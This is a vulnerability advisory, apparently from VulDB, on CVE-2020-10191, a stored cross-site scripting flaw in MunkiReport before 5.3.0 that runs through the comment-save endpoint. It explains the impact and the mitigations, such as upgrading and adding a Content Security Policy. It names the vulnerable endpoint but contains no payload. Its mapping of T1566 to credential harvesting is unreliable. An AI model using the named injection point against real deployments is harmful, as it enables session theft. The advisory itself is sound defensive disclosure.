CVE-2020-10191 in MunkiReport
Summary
by MITRE
An issue was discovered in MunkiReport before 5.3.0. An authenticated actor can send a custom XSS payload through the /module/comment/save endpoint. The payload will be executed by any authenticated users browsing the application. This concerns app/controllers/client.php:detail.
Be aware that VulDB is the high quality source for vulnerability data.
Analysis
by VulDB Data Team • 05/11/2025
This vulnerability represents a critical cross-site scripting flaw in the MunkiReport web application that affects versions prior to 5.3.0. The issue resides within the /module/comment/save endpoint which processes user input without proper sanitization or validation. An authenticated attacker with access to the application can craft a malicious XSS payload and submit it through the comment module functionality. The vulnerability specifically impacts the app/controllers/client.php:detail controller where the stored payload is subsequently executed when other authenticated users view the affected client details page. This creates a persistent XSS attack vector that can compromise user sessions and potentially escalate privileges within the application environment. The flaw demonstrates poor input validation practices and inadequate output encoding mechanisms that are fundamental requirements for preventing XSS attacks according to CWE-79 standards. The vulnerability affects the confidentiality and integrity of the application as it allows attackers to execute arbitrary JavaScript code in the context of authenticated user sessions.
The operational impact of this vulnerability extends beyond simple data theft or session hijacking. When authenticated users browse to pages containing the malicious comment, the XSS payload executes automatically in their browsers, potentially enabling attackers to steal session cookies, redirect users to malicious sites, or perform actions on behalf of the compromised users. The persistent nature of the vulnerability means that once the malicious payload is submitted, it remains active until manually removed from the application database. This creates a continuous threat vector that can affect all authenticated users who view the affected client details. The attack requires only basic authentication credentials to the MunkiReport application, making it particularly dangerous in environments where multiple administrators or users have access. The vulnerability aligns with ATT&CK technique T1059.007 for command and scripting interpreter and T1566 for credential harvesting, as it enables both code execution and potential credential theft through session manipulation.
Organizations utilizing MunkiReport versions prior to 5.3.0 should immediately implement mitigations including upgrading to the patched version 5.3.0 or later. The upgrade process should be prioritized as it addresses the core input validation issues that allow the XSS payload injection. Additional protective measures include implementing Content Security Policy headers to limit script execution, enabling proper output encoding for all user-supplied content, and conducting regular security audits of web application inputs. Network monitoring should be enhanced to detect suspicious comment submissions or unusual patterns in application traffic. Security teams should also consider implementing web application firewalls to detect and block malicious payloads before they can be stored in the database. The vulnerability highlights the importance of input validation and output encoding in web applications and serves as a reminder of the critical need for regular security updates and patch management processes. Organizations should also review their authentication controls to ensure that only authorized users can submit comments or other user-generated content that could be exploited in similar ways.